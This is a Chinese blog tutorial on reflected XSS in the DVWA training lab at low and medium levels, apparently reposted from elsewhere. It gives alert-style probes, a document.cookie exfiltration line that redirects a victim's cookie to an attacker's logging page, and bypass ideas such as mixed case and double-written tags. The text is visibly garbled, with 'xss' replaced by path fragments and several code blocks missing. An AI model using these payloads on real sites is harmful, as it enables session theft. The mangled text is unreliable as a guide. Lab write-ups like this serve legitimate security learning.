dvwa,xss反射型low&&medium

大数据

/img/06/xss,反射型,low&&medium

  • low
    • 发现/img/06/xss
    • 本地搭建
    • 实操
  • medium
  • 作为初学者的我第一次接触比较浅的绕过思路
  • high

low

发现/img/06/xss

本关无过滤

alert(//img/06/xss/)
//或
confirm(//img/06/xss/)
//或
prompt(//img/06/xss/)

出现弹框则存在/img/06/xss,其中alert()confirm()prompt()为弹框函数

在这里插入图片描述

本地搭建

在www目录下放置cookie.php内容如下



js代码如下


document.location='/img/91/?cookie='+document.cookie;
 
//document.location将页面的内容指定到指定位置。



再在www目录下放置cookie.t/img/06/xt文件用于存放盗取的cookie


实操


目前t/img/06/xt文件什么也没有,我们执行js代码


在这里插入图片描述没有报错解析成功,可以看到url地址栏中有用户的cookie此cookie已经储存进了攻击者的t/img/06/xt文件在这里插入图片描述盗取成功在这里插入图片描述


medium


关对


作为初学者的我第一次接触比较浅的绕过思路


Xss反射型


(一):判断是否存在/img/06/xss


/img/38/1:无过滤


使用弹窗函数编写js代码,成功弹框


输入其他标签:(未知领域)


输入,成功弹窗


3:那尝试使用大小写混淆


4:或者双写绕过


<sc


5:还有很多方法自己探究吧相信在以后会掌握更多方法


(二):Js代码如下


(三):盗取cookie


本地www目录下搭建cookie.php


内容如下


再创建cookie.t/img/06/xt文档用于存储盗取的cookie


high


尝试别的语言就可以执行





                                                        
本文来自网络,不代表协通编程立场,如若转载,请注明出处:https://www.net2asp.com/6575a4fd2c.html
                        

                        

                            

                            

                                
(0)


                                                            


                            

                                

                                                                        

                                        

                                                                                                                                                                            

                                        
                                        

                                            
                                        

                                    

                                

                            


                            

                                                                    

                                        
                                        

                                            « 上一篇
                                            1天前
                                        

                                    

                                                                                                    

                                        
                                        

                                            下一篇  »
                                            1天前
                                        

                                    

                                                            

                                                        
相关推荐